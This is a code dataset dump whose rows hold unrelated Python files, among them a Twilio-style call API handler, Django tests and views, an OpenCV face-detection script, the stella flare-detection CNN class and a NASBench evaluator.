content
stringlengths 5
1.05M
|
|---|
# /2010-04-01/Accounts/{AccountSid}/Calls/{CallSid}
# /2010-04-01/Accounts/{AccountSid}/Calls
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.appengine.ext import webapp
from google.appengine.ext.webapp import util
from google.appengine.api import urlfetch
from google.appengine.api.labs import taskqueue
from handlers import base_handlers
from helpers import parameters,response,errors, authorization, xml_helper
from decorators import authorization
from models import calls,phone_numbers, incoming_phone_numbers
import urllib
class CallInstance(base_handlers.InstanceHandler):
def __init__(self):
super(CallInstance,self).__init__()
self.AllowedMethods = ['GET']
self.InstanceModel = calls.Call.all()
self.InstanceModelName = 'Call'
# Initiates a call redirect or terminates a call. See Modifying Live Calls for details.
def post(self):
pass
# Represents a list of recordings generated during the call identified by {CallSid}. See the Recordings section for resource properties and response formats.
class CallInstanceRecordings(base_handlers.InstanceHandler):
def __init__(self):
super(CallInstanceRecordings,self).__init__()
self.AllowedMethods = ['GET']
self.InstanceModel = calls.Call.all()
self.InstanceModelName = 'Recording'
# Represents a list of notifications generated during the call identified by {CallSid}. See the Notifications section for resource properties and response formats.
class CallInstanceNotifications(base_handlers.InstanceHandler):
def __init__(self):
super(CallInstanceNotifications).__init__()
self.AllowedMethods = ['GET']
self.InstanceModel = calls.Call.all()
self.InstanceModelName = 'Notification'
# GET gets a list of calls
# POST initiates a new call
class CallList(base_handlers.ListHandler):
def __init__(self):
"""
To Only show calls to this phone number.
From Only show calls from this phone number.
Status Only show calls currently in this status. May be queued, ringing, in-progress, completed, failed, busy, or no-answer.
StartTime Only show calls that started on this date, given as YYYY-MM-DD. Also supports inequalities, such as StartTime<=YYYY-MM-DD for calls that started at or before midnight on a date, and StartTime>=YYYY-MM-DD for calls that started at or after midnight on a date.
EndTime Only show calls that ended on this date, given as YYYY-MM-DD. Also supports inequalities, such as EndTime<=YYYY-MM-DD for calls that ended at or before midnight on a date, and EndTime>=YYYY-MM-DD for calls that end at or after midnight on a date.
"""
self.InstanceModel = calls.Call.all()
self.AllowedMethods = ['GET']
self.AllowedFilters = {
'GET':[['To','='],['From','='],['Status','=']]#,['StartTime','='],['EndTime','=']]#Times are not implemented yet
}
self.ListName = 'Calls'
self.InstanceModelName = 'Call'
@authorization.authorize_request
def post(self,API_VERSION,ACCOUNT_SID,*args):
"""
From The phone number to use as the caller id. Format with a '+' and country code e.g., +16175551212 (E.164 format). Must be a Twilio number or a valid outgoing caller id for your account.
To The number to call formatted with a '+' and country code e.g., +16175551212 (E.164 format). Twilio will also accept unformatted US numbers e.g., (415) 555-1212, 415-555-1212.
Url The fully qualified URL that should be consulted when the call connects. Just like when you set a URL for your inbound calls.
Method The HTTP method Twilio should use when requesting the required Url parameter's value above. Defaults to POST.
FallbackUrl A URL that Twilio will request if an error occurs requesting or executing the TwiML at Url.
FallbackMethod The HTTP method that Twilio should use to request the FallbackUrl. Must be either GET or POST. Defaults to POST.
StatusCallback A URL that Twilio will request when the call ends to notify your app.
StatusCallbackMethod The HTTP method Twilio should use when requesting the above URL. Defaults to POST.
SendDigits A string of keys to dial after connecting to the number. Valid digits in the string include: any digit (0-9), '#' and '*'. For example, if you connected to a company phone number, and wanted to dial extension 1234 and then the pound key, use SendDigits=1234#. Remember to URL-encode this string, since the '#' character has special meaning in a URL.
IfMachine Tell Twilio to try and determine if a machine (like voicemail) or a human has answered the call. Possible values are Continue and Hangup. See the answering machines section below for more info.
Timeout The integer number of seconds that Twilio should allow the phone to ring before assuming there is no answer. Default is 60 seconds, the maximum is 999 seconds. Note, you could set this to a low value, such as 15, to hangup before reaching an answering machine or voicemail. Also see the answering machine section for other solutions.
"""
format = response.response_format(self.request.path.split('/')[-1])
if parameters.required(['From','To','Url'],self.request):
Phone_Number = incoming_phone_numbers.Incoming_Phone_Number.all().filter('PhoneNumber = ',self.request.get('From')).filter('AccountSid =',ACCOUNT_SID).get()
if Phone_Number is None:
Phone_Number = outgoing_caller_ids.Outgoing_Caller_Id.all().filter('PhoneNumber =', self.request.get('From')).filter('AccountSid =', ACCOUNT_SID).get()
if Phone_Number is not None:
Call = calls.Call.new(
From = self.request.get('From'),
To = self.request.get('To'),
PhoneNumberSid = Phone_Number.Sid,
AccountSid = ACCOUNT_SID,
Status = 'queued',
Direction = 'outbound-api'
)
Call.put()
response_data = Call.get_dict()
#has been queueud so lets ring
Call.ring()
#ringing, what should we do? connect and read twiml and parse, fail, busy signal or no answer
#default is to connect, read twiml and do some things i guess
#Call.connect(Phone_Number, self.request)
"""
if self.request.get('StatusCallback',None) is not None:
StatusCallback = self.request.get('StatusCallback')
StatusCallbackMethod = self.request.get('StatusCallbackMethod','POST').upper()
if StatusCallbackMethod not in ['GET','POST']:
StatusCallbackMethod = 'POST'
elif Phone_Number.StatusCallback is not None:
StatusCallback = Phone_Number.StatusCallback
StatusCallbackMethod = Phone_Number.StatusCallbackMethod
if self.request.get('StatusCallback',None) is not None or Phone_Number.StatusCallback is not None:
Call.disconnect(StatusCallback,StatusCallbackMethod)
"""
response_data = Call.get_dict()
self.response.out.write(response.format_response(response.add_nodes(self,response_data,format),format))
else:
#we dont have a valid outgoing phone number to which to make the call
self.response.out.write(response.format_response(errors.rest_error_response(400,"Resource not found",format,21212, 'http://www.twilio.com/docs/error/21212' ),format))
else:
self.response.out.write(response.format_response(errors.rest_error_response(400,"Missing Parameters",format),format))
def main():
application = webapp.WSGIApplication([
('/(.*)/Accounts/(.*)/Calls/(.*)/Recordings', CallInstanceRecordings),
('/(.*)/Accounts/(.*)/Calls/(.*)/Notifications', CallInstanceNotifications),
('/(.*)/Accounts/(.*)/Calls/(.*)', CallInstance),
('/(.*)/Accounts/(.*)/Calls.*', CallList)
],
debug=True)
util.run_wsgi_app(application)
if __name__ == '__main__':
main()
|
"""
Plot a snapshot of a food web graph/network.
Needs: Adjacency list of who eats whom (consumer name/id in 1st
column, resource name/id in 2nd column), and list of species
names/ids and properties such as biomass (node abundance), or average
body mass.
"""
import networkx as nx
import scipy as sc
import matplotlib.pyplot as plt
# import matplotlib.animation as ani #for animation
def GenRdmAdjList(N = 2, C = 0.5):
"""
Generate random adjacency list given N nodes with connectance
probability C
"""
Ids = range(N)
ALst = []
for i in Ids:
if sc.random.uniform(0,1,1) < C:
Lnk = sc.random.choice(Ids,2).tolist()
if Lnk[0] != Lnk[1]: #avoid self loops
ALst.append(Lnk)
return ALst
## Assign body mass range
SizRan = ([-10,10]) #use log scale
## Assign number of species (MaxN) and connectance (C)
MaxN = 30
C = 0.75
## Generate adjacency list:
AdjL = sc.array(GenRdmAdjList(MaxN, C))
## Generate species (node) data:
Sps = sc.unique(AdjL) # get species ids
Sizs = sc.random.uniform(SizRan[0],SizRan[1],MaxN)# Generate body sizes (log10 scale)
###### The Plotting #####
plt.close('all')
##Plot using networkx:
## Calculate coordinates for circular configuration:
## (See networkx.layout for inbuilt functions to compute other types of node
# coords)
pos = nx.circular_layout(Sps)
G = nx.Graph()
G.add_nodes_from(Sps)
G.add_edges_from(tuple(AdjL))
NodSizs= 10**-32 + (Sizs-min(Sizs))/(max(Sizs)-min(Sizs)) #node sizes in proportion to body sizes
nx.draw(G, pos, node_size = NodSizs*1000)
plt.show()
|
from django.core import mail
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
class TestResendMail(APITestCase):
fixtures = ["user.json"]
url: str
@classmethod
def setUpTestData(cls):
cls.url = reverse("account_resend_email")
def setUp(self):
# Signup to get the key from the confirmation email
response = self.client.post(
reverse("account_register"),
{
"email": "new@test.at",
"password1": "cdpyHEKZ0KiJmlR",
"password2": "cdpyHEKZ0KiJmlR",
},
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
def test_ok(self):
response = self.client.post(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(mail.outbox)
def test_get(self):
response = self.client.get(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_put(self):
response = self.client.put(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_patch(self):
response = self.client.patch(self.url, {"email": "new@test.at"})
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_delete(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
|
"""
Given a string of numbers and operators, return all possible results from computing all the different possible ways to
group numbers and operators. The valid operators are +, - and *.
Example 1
Input: "2-1-1".
((2-1)-1) = 0
(2-(1-1)) = 2
Output: [0, 2]
Example 2
Input: "2*3-4*5"
(2*(3-(4*5))) = -34
((2*3)-(4*5)) = -14
((2*(3-4))*5) = -10
(2*((3-4)*5)) = -10
(((2*3)-4)*5) = 10
Output: [-34, -14, -10, -10, 10]
"""
import re
__author__ = 'Daniel'
class Solution:
def diffWaysToCompute(self, input):
"""
:type: input
:rtype: list[]
"""
input_lst = re.split(r"(\D)", input) # capturing parentheses
nums = map(int, filter(lambda x: re.match(r"\d+", x), input_lst))
ops = filter(lambda x: re.match(r"\D", x), input_lst)
ret = self.dfs_eval(nums, ops)
return ret
def dfs_eval(self, nums, ops):
ret = []
if not ops:
assert len(nums) == 1
return nums
for i, op in enumerate(ops):
left_vals = self.dfs_eval(nums[:i+1], ops[:i])
right_vals = self.dfs_eval(nums[i+1:], ops[i+1:])
for l in left_vals:
for r in right_vals:
ret.append(self._eval(l, r, op))
return ret
def _eval(self, a, b, op):
return {
"+": lambda a, b: a+b,
"-": lambda a, b: a-b,
"*": lambda a, b: a*b,
}[op](a, b)
if __name__ == "__main__":
assert Solution().diffWaysToCompute("1+1") == [2]
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 20:16:57 2020
@author: Soumya Kanti Mandal
"""
import cv2
import urllib.request
from matplotlib import pyplot as plt
from pylab import rcParams
image_url="https://skm96.github.io/image/s2.jpg"
image_name="skm.jpg"
urllib.request.urlretrieve(image_url, image_name)
image1 = cv2.imread("skm.jpg")
plt.imshow(image1)
# now fixing color axis and increse size
def plt_show(image,title="",gray=False,size=(12,10)):
temp = image
#fix color
if gray==False:
temp=cv2.cvtColor(temp,cv2.COLOR_BGR2RGB)
#change img size
rcParams['figure.figsize'] = size[0] , size[1]
plt.axis("off")
plt.title(title)
plt.imshow(temp,cmap='gray')
plt.show()
#display image nicely
plt_show(image1,"Face Detection Phase 1")
# image detect using Haar Cascades
haaarcascade_url="https://raw.githubusercontent.com/opencv/opencv/master/data/haarcascades/haarcascade_frontalface_default.xml"
haar_name="haarcascade_frontalface_defult.xml"
urllib.request.urlretrieve(haaarcascade_url,haar_name)
#create facial detection classifier
detector=cv2.CascadeClassifier('haarcascade_frontalface_defult.xml')
# detect faces using the array
faces_list = detector.detectMultiScale(image1,
scaleFactor=1.2,
minNeighbors=10,
minSize=(64,64),
flags=cv2.CASCADE_SCALE_IMAGE)
print(faces_list)
# drow ractangles around faces to check
for face in faces_list: #draw ractangle for each face
#x & y axis and height & width
(x,y,w,h) = face
cv2.rectangle(image1,
(x,y), #bottom left corner as like axis
(x+w,y+h), #top right corner
(0,255,0), #color green
3) #line thickness of ractangle
plt_show(image1)
# we now see that we can only plot faces of diffrent faces
for face in faces_list:
(x,y,w,h) = face
#plot each face now
face=image1[y:y + h, x:x + w] #crop to face
face_resize =cv2.resize(face,(80,80)) #resize
plt_show(face_resize,size=(6,5))
|
import torch
@torch.enable_grad()
def sample(net, m=64, n_ch=3, im_w=32, im_h=32, K=10, device='cpu', p_0=None):
if p_0 is None:
sample_p_0 = lambda: torch.FloatTensor(m, n_ch, im_w, im_h).uniform_(-1, 1).to(device)
else:
sample_p_0 = lambda: p_0.uniform_(-1, 1).to(device)
x_k = torch.autograd.Variable(sample_p_0(), requires_grad=True)
for k in range(K):
net_prime = torch.autograd.grad(net(x_k).sum(), [x_k], retain_graph=True)[0]
x_k.data += net_prime + 1e-2 * torch.randn_like(x_k)
return x_k.detach()
|
# Generated by Django 3.1.7 on 2021-04-09 14:20
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rest_api', '0010_delete_country'),
]
operations = [
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=100)),
('description', models.TextField(default='')),
('regions', models.ManyToManyField(to='rest_api.Region')),
],
),
migrations.CreateModel(
name='ExtremeSport',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('period', models.CharField(max_length=100)),
('daily_costs', models.CharField(max_length=15)),
('country', models.ForeignKey(blank=True, default='', on_delete=django.db.models.deletion.CASCADE, to='rest_api.country')),
],
),
]
|
from django.shortcuts import render
from rest_framework import generics
from .models import Book
from .serializer import BookSerializer
from rest_framework.response import Response
# Create your views here.
class GetInfo(generics.RetrieveAPIView):
def get(self, request, *args, **kwargs):
# serializer_class = BookSerializer
# Saco mi elemento de bd
info = Book.objects.get(id = kwargs['pk'])
# Convierto
test = BookSerializer(info)
print(test.data)
print(info)
return Response(test.data)
|
r = 15
def setup():
global location, velocity
size(640, 360)
this.surface.setTitle("Bouncing Ball with PVectors")
location = PVector(100, 100)
velocity = PVector(2.5, 5)
def draw():
background(235, 215, 182)
location.add(velocity)
# check boundaries
if (location.x > width - r) or (location.x < r):
velocity.x = velocity.x * -1
if (location.y > height - r) or (location.y < r):
velocity.y = velocity.y * -1
stroke(0)
fill(255, 100, 255)
ellipse(location.x, location.y, 2*r, 2*r)
|
import os, glob
import numpy as np
from tqdm import tqdm
import tensorflow as tf
from tensorflow import keras
from scipy.interpolate import interp1d
from astropy.table import Table, Column
__all__ = ['ConvNN']
class ConvNN(object):
"""
Creates and trains the convolutional
neural network.
"""
def __init__(self, output_dir, ds=None,
layers=None, optimizer='adam',
loss='binary_crossentropy',
metrics=None):
"""
Creates and trains a Tensorflow keras model
with either layers that have been passed in
by the user or with default layers used in
Feinstein et al. (2020; in prep.).
Parameters
----------
ds : stella.DataSet object
output_dir : str
Path to a given output directory for files.
training : float, optional
Assigns the percentage of training set data for training.
Default is 80%.
validation : float, optional
Assigns the percentage of training set data for validation.
Default is 10%.
layers : np.array, optional
An array of keras.layers for the ConvNN.
optimizer : str, optional
Optimizer used to compile keras model. Default is 'adam'.
loss : str, optional
Loss function used to compile keras model. Default is
'binary_crossentropy'.
metrics: np.array, optional
Metrics used to train the keras model on. If None, metrics are
[accuracy, precision, recall].
epochs : int, optional
Number of epochs to train the keras model on. Default is 15.
seed : int, optional
Sets random seed for reproducable results. Default is 2.
output_dir : path, optional
The path to save models/histories/predictions to. Default is
to create a hidden ~/.stella directory.
Attributes
----------
layers : np.array
optimizer : str
loss : str
metrics : np.array
training_matrix : stella.TrainingSet.training_matrix
labels : stella.TrainingSet.labels
image_fmt : stella.TrainingSet.cadences
"""
self.ds = ds
self.layers = layers
self.optimizer = optimizer
self.loss = loss
self.metrics = metrics
if ds is not None:
self.training_matrix = np.copy(ds.training_matrix)
self.labels = np.copy(ds.labels)
self.cadences = np.copy(ds.cadences)
self.frac_balance = ds.frac_balance + 0.0
self.tpeaks = ds.training_peaks
self.training_ids = ds.training_ids
else:
print("WARNING: No stella.DataSet object passed in.")
print("Can only use stella.ConvNN.predict().")
self.prec_recall_curve = None
self.history = None
self.history_table = None
self.output_dir = output_dir
def create_model(self, seed):
"""
Creates the Tensorflow keras model with appropriate layers.
Attributes
----------
model : tensorflow.python.keras.engine.sequential.Sequential
"""
# SETS RANDOM SEED FOR REPRODUCABLE RESULTS
np.random.seed(seed)
tf.random.set_seed(seed)
# INITIALIZE CLEAN MODEL
keras.backend.clear_session()
model = keras.models.Sequential()
# DEFAULT NETWORK MODEL FROM FEINSTEIN ET AL. (in prep)
if self.layers is None:
filter1 = 16
filter2 = 64
dense = 32
dropout = 0.1
# CONVOLUTIONAL LAYERS
model.add(tf.keras.layers.Conv1D(filters=filter1, kernel_size=7,
activation='relu', padding='same',
input_shape=(self.cadences, 1)))
model.add(tf.keras.layers.MaxPooling1D(pool_size=2))
model.add(tf.keras.layers.Dropout(dropout))
model.add(tf.keras.layers.Conv1D(filters=filter2, kernel_size=3,
activation='relu', padding='same'))
model.add(tf.keras.layers.MaxPooling1D(pool_size=2))
model.add(tf.keras.layers.Dropout(dropout))
# DENSE LAYERS AND SOFTMAX OUTPUT
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(dense, activation='relu'))
model.add(tf.keras.layers.Dropout(dropout))
model.add(tf.keras.layers.Dense(1, activation='sigmoid'))
else:
for l in self.layers:
model.add(l)
# COMPILE MODEL AND SET OPTIMIZER, LOSS, METRICS
if self.metrics is None:
model.compile(optimizer=self.optimizer,
loss=self.loss,
metrics=['accuracy', tf.keras.metrics.Precision(),
tf.keras.metrics.Recall()])
else:
model.compile(optimizer=self.optimizer,
loss=self.loss,
metrics=self.metrics)
self.model = model
# PRINTS MODEL SUMMARY
model.summary()
def load_model(self, modelname, mode='validation'):
"""
Loads an already created model.
Parameters
----------
modelname : str
mode : str, optional
"""
model = keras.models.load_model(modelname)
self.model = model
if mode == 'test':
pred = model.predict(self.ds.test_data)
elif mode == 'validation':
pred = model.predict(self.ds.val_data)
pred = np.reshape(pred, len(pred))
## Calculate metrics from here
return
def train_models(self, seeds=[2], epochs=350, batch_size=64, shuffle=False,
pred_test=False, save=False):
"""
Runs n number of models with given initial random seeds of
length n. Also saves each model run to a hidden ~/.stella
directory.
Parameters
----------
seeds : np.array
Array of random seed starters of length n, where
n is the number of models you want to run.
epochs : int, optional
Number of epochs to train for. Default is 350.
batch_size : int, optional
Setting the batch size for the training. Default
is 64.
shuffle : bool, optional
Allows for shuffling of the training set when fitting
the model. Default is False.
pred_test : bool, optional
Allows for predictions on the test set. DO NOT SET TO
TRUE UNTIL YOU'VE DECIDED ON YOUR FINAL MODEL. Default
is False.
save : bool, optional
Saves the predictions and histories of from each model
in an ascii table to the specified output directory.
Default is False.
Attributes
----------
history_table : Astropy.table.Table
Saves the metric values for each model run.
val_pred_table : Astropy.table.Table
Predictions on the validation set from each run.
test_pred_table : Astropy.table.Table
Predictions on the test set from each run. Must set
pred_test = True, or else it is an empty table.
"""
if type(seeds) == int or type(seeds) == float or type(seeds) == np.int64:
seeds = np.array([seeds])
self.epochs = epochs
# CREATES TABLES FOR SAVING DATA
table = Table()
val_table = Table([self.ds.val_ids, self.ds.val_labels, self.ds.val_tpeaks],
names=['tic', 'gt', 'tpeak'])
test_table = Table([self.ds.test_ids, self.ds.test_labels, self.ds.test_tpeaks],
names=['tic', 'gt', 'tpeak'])
for seed in seeds:
fmt_tail = '_s{0:04d}_i{1:04d}_b{2}'.format(int(seed), int(epochs), self.frac_balance)
model_fmt = 'ensemble' + fmt_tail + '.h5'
keras.backend.clear_session()
# CREATES MODEL BASED ON GIVEN RANDOM SEED
self.create_model(seed)
self.history = self.model.fit(self.ds.train_data, self.ds.train_labels,
epochs=epochs,
batch_size=batch_size, shuffle=shuffle,
validation_data=(self.ds.val_data, self.ds.val_labels))
col_names = list(self.history.history.keys())
for cn in col_names:
col = Column(self.history.history[cn], name=cn+'_s{0:04d}'.format(int(seed)))
table.add_column(col)
# SAVES THE MODEL TO OUTPUT DIRECTORY
self.model.save(os.path.join(self.output_dir, model_fmt))
# GETS PREDICTIONS FOR EACH VALIDATION SET LIGHT CURVE
val_preds = self.model.predict(self.ds.val_data)
val_preds = np.reshape(val_preds, len(val_preds))
val_table.add_column(Column(val_preds, name='pred_s{0:04d}'.format(int(seed))))
# GETS PREDICTIONS FOR EACH TEST SET LIGHT CURVE IF PRED_TEST IS TRUE
if pred_test is True:
test_preds = self.model.predict(self.ds.test_data)
test_preds = np.reshape(test_preds, len(test_preds))
test_table.add_column(Column(test_preds, name='pred_s{0:04d}'.format(int(seed))))
# SETS TABLE ATTRIBUTES
self.history_table = table
self.val_pred_table = val_table
self.test_pred_table = test_table
# SAVES TABLE IS SAVE IS TRUE
if save is True:
fmt_table = '_i{0:04d}_b{1}.txt'.format(int(epochs), self.frac_balance)
hist_fmt = 'ensemble_histories' + fmt_table
pred_fmt = 'ensemble_predval' + fmt_table
table.write(os.path.join(self.output_dir, hist_fmt), format='ascii')
val_table.write(os.path.join(self.output_dir, pred_fmt), format='ascii',
fast_writer=False)
if pred_test is True:
test_fmt = 'ensemble_predtest' + fmt_table
test_table.write(os.path.join(self.output_dir, test_fmt), format='ascii',
fast_writer=False)
def cross_validation(self, seed=2, epochs=350, batch_size=64,
n_splits=5, shuffle=False, pred_test=False, save=False):
"""
Performs cross validation for a given number of K-folds.
Reassigns the training and validation sets for each fold.
Parameters
----------
seed : int, optional
Sets random seed for creating CNN model. Default is 2.
epochs : int, optional
Number of epochs to run each folded model on. Default is 350.
batch_size : int, optional
The batch size for training. Default is 64.
n_splits : int, optional
Number of folds to perform. Default is 5.
shuffle : bool, optional
Allows for shuffling in scikitlearn.model_slection.KFold.
Default is False.
pred_test : bool, optional
Allows for predicting on the test set. DO NOT SET TO TRUE UNTIL
YOU ARE HAPPY WITH YOUR FINAL MODEL. Default is False.
save : bool, optional
Allows the user to save the kfolds table of predictions.
Defaul it False.
Attributes
----------
crossval_predval : astropy.table.Table
Table of predictions on the validation set from each fold.
crossval_predtest : astropy.table.Table
Table of predictions on the test set from each fold. ONLY
EXISTS IF PRED_TEST IS TRUE.
crossval_histories : astropy.table.Table
Table of history values from the model run on each fold.
"""
from sklearn.model_selection import KFold
from sklearn.metrics import precision_recall_curve
from sklearn.metrics import average_precision_score
num_flares = len(self.labels)
trainval_cutoff = int(0.90 * num_flares)
tab = Table()
predtab = Table()
x_trainval = self.training_matrix[0:trainval_cutoff]
y_trainval = self.labels[0:trainval_cutoff]
p_trainval = self.tpeaks[0:trainval_cutoff]
t_trainval = self.training_ids[0:trainval_cutoff]
kf = KFold(n_splits=n_splits, shuffle=shuffle)
if pred_test is True:
pred_test_table = Table()
i = 0
for ti, vi in kf.split(y_trainval):
# CREATES TRAINING AND VALIDATION SETS
x_train = x_trainval[ti]
y_train = y_trainval[ti]
x_val = x_trainval[vi]
y_val = y_trainval[vi]
p_val = p_trainval[vi]
t_val = t_trainval[vi]
# REFORMAT TO ADD ADDITIONAL CHANNEL TO DATA
x_train = x_train.reshape(x_train.shape[0], x_train.shape[1], 1)
x_val = x_val.reshape(x_val.shape[0], x_val.shape[1], 1)
# CREATES MODEL AND RUNS ON REFOLDED TRAINING AND VALIDATION SETS
self.create_model(seed)
history = self.model.fit(x_train, y_train,
epochs=epochs,
batch_size=batch_size, shuffle=shuffle,
validation_data=(x_val, y_val))
# SAVES THE MODEL BY DEFAULT
self.model.save(os.path.join(self.output_dir, 'crossval_s{0:04d}_i{1:04d}_b{2}_f{3:04d}.h5'.format(int(seed),
int(epochs),
self.frac_balance,
i)))
# CALCULATE METRICS FOR VALIDATION SET
pred_val = self.model.predict(x_val)
pred_val = np.reshape(pred_val, len(pred_val))
# SAVES PREDS FOR VALIDATION SET
tab_names = ['id', 'gt', 'peak', 'pred']
data = [t_val, y_val, p_val, pred_val]
for j, tn in enumerate(tab_names):
col = Column(data[j], name=tn+'_f{0:03d}'.format(i))
predtab.add_column(col)
# PREDICTS ON TEST SET IF PRED_TEST IS TRUE
if pred_test is True:
preds = self.model.predict(self.ds.test_data)
preds = np.reshape(preds, len(preds))
data = [self.ds.test_ids, self.ds.test_labels, self.ds.test_tpeaks,
np.reshape(preds, len(preds))]
for j, tn in enumerate(tab_names):
col = Column(data[j], name=tn+'_f{0:03d}'.format(i))
pred_test_table.add_column(col)
self.crossval_predtest = pred_test_table
precision, recall, _ = precision_recall_curve(y_val, pred_val)
ap_final = average_precision_score(y_val, pred_val, average=None)
# SAVES HISTORIES TO A TABLE
col_names = list(history.history.keys())
for cn in col_names:
col = Column(history.history[cn], name=cn+'_f{0:03d}'.format(i))
tab.add_column(col)
# KEEPS TRACK OF WHICH FOLD
i += 1
# SETS TABLES AS ATTRIBUTES
self.crossval_predval = predtab
self.crossval_histories = tab
# IF SAVE IS TRUE, SAVES TABLES TO OUTPUT DIRECTORY
if save is True:
fmt = 'crossval_{0}_s{1:04d}_i{2:04d}_b{3}.txt'
predtab.write(os.path.join(self.output_dir, fmt.format('predval', int(seed),
int(epochs), self.frac_balance)), format='ascii',
fast_writer=False)
tab.write(os.path.join(self.output_dir, fmt.format('histories', int(seed),
int(epochs), self.frac_balance)), format='ascii',
fast_writer=False)
# SAVES TEST SET PREDICTIONS IF TRUE
if pred_test is True:
pred_test_table.write(os.path.join(self.output_dir, fmt.format('predtest', int(seed),
int(epochs), self.frac_balance)),
format='ascii', fast_writer=False)
def calibration(self, df, metric_threshold):
"""
Transforming the rankings output by the CNN into actual probabilities.
This can only be run for an ensemble of models.
Parameters
----------
df : astropy.Table.table
Table of output predictions from the validation set.
metric_threshold : float
Defines ranking above which something is considered
a flares.
"""
# ADD COLUMN TO TABLE THAT CALCULATES THE FRACTION OF MODELS
# THAT SAY SOMETHING IS A FLARE
names= [i for i in df.colnames if 's' in i]
flare_frac = np.zeros(len(df))
for i, val in enumerate(len(df)):
preds = np.array(list(df[names][i]))
flare_frac[i] = len(preds[preds >= threshold]) / len(preds)
df.add_column(Column(flare_frac, name='flare_frac'))
# !! WORK IN PROGRESS !!
return df
def predict(self, modelname, times, fluxes, errs,
multi_models=False, injected=False):
"""
Takes in arrays of time and flux and predicts where the flares
are based on the keras model created and trained.
Parameters
----------
modelname : str
Path and filename of a model to load.
times : np.ndarray
Array of times to predict flares in.
fluxes : np.ndarray
Array of fluxes to predict flares in.
flux_errs : np.ndarray
Array of flux errors for predicted flares.
injected : bool, optional
Returns predictions instead of setting attribute. Used
for injection-recovery. Default is False.
Attributes
----------
model : tensorflow.python.keras.engine.sequential.Sequential
The model input with modelname.
predict_time : np.ndarray
The input times array.
predict_flux : np.ndarray
The input fluxes array.
predict_err : np.ndarray
The input flux errors array.
predictions : np.ndarray
An array of predictions from the model.
"""
def identify_gaps(t):
"""
Identifies which cadences can be predicted on given
locations of gaps in the data. Will always stay
cadences/2 away from the gaps.
Returns lists of good indices to predict on.
"""
nonlocal cad_pad
# SETS ALL CADENCES AVAILABLE
all_inds = np.arange(0, len(t), 1, dtype=int)
# REMOVES BEGINNING AND ENDS
bad_inds = np.arange(0,cad_pad,1,dtype=int)
bad_inds = np.append(bad_inds, np.arange(len(t)-cad_pad,
len(t), 1, dtype=int))
diff = np.diff(t)
med, std = np.nanmedian(diff), np.nanstd(diff)
bad = np.where(np.abs(diff) >= med + 1.5*std)[0]
for b in bad:
bad_inds = np.append(bad_inds, np.arange(b-cad_pad,
b+cad_pad,
1, dtype=int))
bad_inds = np.sort(bad_inds)
return np.delete(all_inds, bad_inds)
model = keras.models.load_model(modelname)
self.model = model
# GETS REQUIRED INPUT SHAPE FROM MODEL
cadences = model.input.shape[1]
cad_pad = cadences/2
# REFORMATS FOR A SINGLE LIGHT CURVE PASSED IN
try:
times[0][0]
except:
times = [times]
fluxes = [fluxes]
errs = [errs]
predictions = []
pred_t, pred_f, pred_e = [], [], []
for j in tqdm(range(len(times))):
time = times[j] + 0.0
lc = fluxes[j] / np.nanmedian(fluxes[j]) # MUST BE NORMALIZED
err = errs[j] + 0.0
q = ( (np.isnan(time) == False) & (np.isnan(lc) == False))
time, lc, err = time[q], lc[q], err[q]
# APPENDS MASKED LIGHT CURVES TO KEEP TRACK OF
pred_t.append(time)
pred_f.append(lc)
pred_e.append(err)
good_inds = identify_gaps(time)
reshaped_data = np.zeros((len(lc), cadences))
for i in good_inds:
loc = [int(i-cad_pad), int(i+cad_pad)]
f = lc[loc[0]:loc[1]]
t = time[loc[0]:loc[1]]
reshaped_data[i] = f
reshaped_data = reshaped_data.reshape(reshaped_data.shape[0],
reshaped_data.shape[1], 1)
preds = model.predict(reshaped_data)
preds = np.reshape(preds, (len(preds),))
predictions.append(preds)
self.predict_time = np.array(pred_t)
self.predict_flux = np.array(pred_f)
self.predict_err = np.array(pred_e)
self.predictions = np.array(predictions)
|
from nasbench import api
import deep_architect.core as co
import deep_architect.contrib.misc.search_spaces.tensorflow_eager.nasbench_space as nb
INPUT = 'input'
OUTPUT = 'output'
node_op_names = {
'conv1': 'conv1x1-bn-relu',
'conv3': 'conv3x3-bn-relu',
'max3': 'maxpool3x3'
}
class NasbenchEvaluator:
def __init__(self, tfrecord_file, num_nodes_per_cell, epochs):
self.nasbench = api.NASBench(tfrecord_file)
self.num_nodes_per_cell = num_nodes_per_cell
self.epochs = epochs
self.ssf = nb.SSF_Nasbench()
"""
Preconditions: inputs and outputs should be unspecified. vs should be
the full hyperparameter value list
"""
def eval(self, vs):
_, outputs = self.ssf.get_search_space()
node_ops = [None] * self.num_nodes_per_cell
node_ops[0] = INPUT
node_ops[-1] = OUTPUT
matrix = [[0] * self.num_nodes_per_cell
for _ in range(self.num_nodes_per_cell)]
for i, h in enumerate(
co.unassigned_independent_hyperparameter_iterator(outputs)):
h_name = h.get_name().split('-')[-2]
if 'node' in h_name:
node_num = int(h_name.split('_')[-1])
node_ops[node_num + 1] = node_op_names[vs[i]]
elif 'in' in h_name:
h_name = h_name.split('_')
matrix[int(h_name[1])][int(h_name[2])] = vs[i]
